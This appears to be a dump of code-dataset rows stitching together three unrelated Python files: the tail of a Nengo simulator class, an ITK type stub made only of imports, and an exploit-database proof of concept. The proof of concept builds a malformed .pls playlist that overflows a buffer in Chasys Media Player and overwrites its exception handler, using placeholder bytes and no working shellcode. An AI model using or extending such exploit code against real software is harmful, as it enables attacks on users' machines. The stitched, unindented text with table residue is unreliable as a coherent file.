super(HostedSimulator, self).step()
def is_on_host(self, obj):
if isinstance(obj, nengo_normal_form.DecoderNode):
return False
if isinstance(obj, nengo.Node):
return True
if isinstance(obj, nengo.Ensemble):
if isinstance(obj.neuron_type, nengo.Direct):
return True
else:
return False
raise nengo.exceptions.NengoException(
'Unhandled connection to/from %s' % obj)
| [
"[email protected]"
] | |
00104352c1370d91932fa8d8269ab961641f0546 | 5201e237c0d58cdfdbc2fdf8103f9141161eb9f8 | /ITKFastMarchingPython.pyi | 29ae0da83b4f80330b389cd611cb717d8648dacb | [] | no_license | hjmjohnson/itk-stubs | 704f5b92a755e55b81d02fcad62a366143e125f3 | 771951d007ae425b758e088eae6f9e4ca0e4afb1 | refs/heads/main | 2023-01-22T05:50:33.649088 | 2020-12-04T01:31:09 | 2020-12-04T01:35:06 | 318,368,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | pyi | from itk.itkLevelSetNodePython import *
from itk.itkNodePairPython import *
from itk.itkFastMarchingStoppingCriterionBasePython import *
from itk.ITKFastMarchingBasePython import *
from itk.itkFastMarchingImageFilterBasePython import *
from itk.itkFastMarchingExtensionImageFilterPython import *
from itk.itkFastMarchingImageFilterPython import *
from itk.itkFastMarchingImageToNodePairContainerAdaptorPython import *
from itk.itkFastMarchingReachedTargetNodesStoppingCriterionPython import *
from itk.itkFastMarchingThresholdStoppingCriterionPython import *
from itk.itkFastMarchingUpwindGradientImageFilterPython import *
from itk.itkFastMarchingUpwindGradientImageFilterBasePython import *
from typing import Any
class _SwigNonDynamicMeta(type):
__setattr__: Any = ...
swig: Any
| [
"[email protected]"
] | |
0a32b3ef2fb132f35bbac420ae65c23c9a600a2d | 4dc0b92ae40c4bb90e4549732cab8b1f2d4305c6 | /platforms/windows/dos/8232.py | c9204be6911fdfac7062141a0fd3580830f5263a | [] | no_license | xiaohen/exploit-database | be462a39978d6309ae98677e662dc8b228f936a8 | d02449c714d2df225eba6f55b65d9840e6d19a5f | refs/heads/master | 2021-01-17T10:00:13.535969 | 2014-03-02T04:29:43 | 2014-03-02T04:29:43 | 17,334,511 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | #!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : [email protected]"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.